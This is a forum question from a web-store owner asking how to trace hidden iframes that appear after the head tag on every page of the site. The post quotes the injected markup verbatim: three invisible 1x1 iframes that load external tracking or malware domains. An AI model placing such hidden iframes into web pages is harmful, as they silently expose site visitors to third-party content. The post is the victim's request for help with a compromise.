Computing.Net > Forums > Web Development > How to locate IFRAME Tags

Computer Problems? Computing.Net has over 1,000,000 posts about all things technology related! Over 90% answered within 24 hours! Click here to start participating now! Also, be sure to check out the New User Guide.

How to locate IFRAME Tags

Reply to Message Icon

Name: NooK
Date: January 18, 2009 at 06:53:46 Pacific
OS: Microsoft Windows XP Professional
CPU/Ram: 1.7 GHz / 1023 MB
Product: System manufacturer / System name
Subcategory: General
Comment:

Hey Everyone,

I have a online store I'm trying to create, https://store.rcct.ca , as you can see when you goto this site. An error message pops up saying "This page contains, sercure and unsecure ITEMS, press yes or no to continue." The cert is installed correctly, I was told this is caused by certiain lines of code do not reference HTTPS they are referencing HTTP. When I "VIEW SOURCE" the only thing I can see that is referencing HTTP:// is in after the <head> tags of every page.

Here is the code, that is being IFRAME injected:

<iframe src="http://hostverify.net/?click=2730375" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://hosttracker.net/?click=32431937" width=1 height=1 style="visibility:hidden;position:absolute"></iframe><iframe src="http://webexperience13.com/?click=24957953" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
<head>

How does one locate where this script is being gererated from? I'm almost certain this is causing the security warning for the certficate. I have searched all files, in the store for the above lines embedded somewhere.

Any thoughts would help.

Thanks!





Sponsored Link
Ads by Google
Reply to Message Icon

Related Posts

See More







Post Locked

This post is quite old and has been locked from receiving new replies. Please create a new posting instead.


Go to Web Development Forum Home


Sponsored links

Ads by Google


Results for: How to locate IFRAME Tags

How to know when all iFrames load? www.computing.net/answers/webdevel/how-to-know-when-all-iframes-load/1905.html

meta tags - how do they work www.computing.net/answers/webdevel/meta-tags-how-do-they-work/2658.html

Pop up how to and graphic pointers www.computing.net/answers/webdevel/pop-up-how-to-and-graphic-pointers/3077.html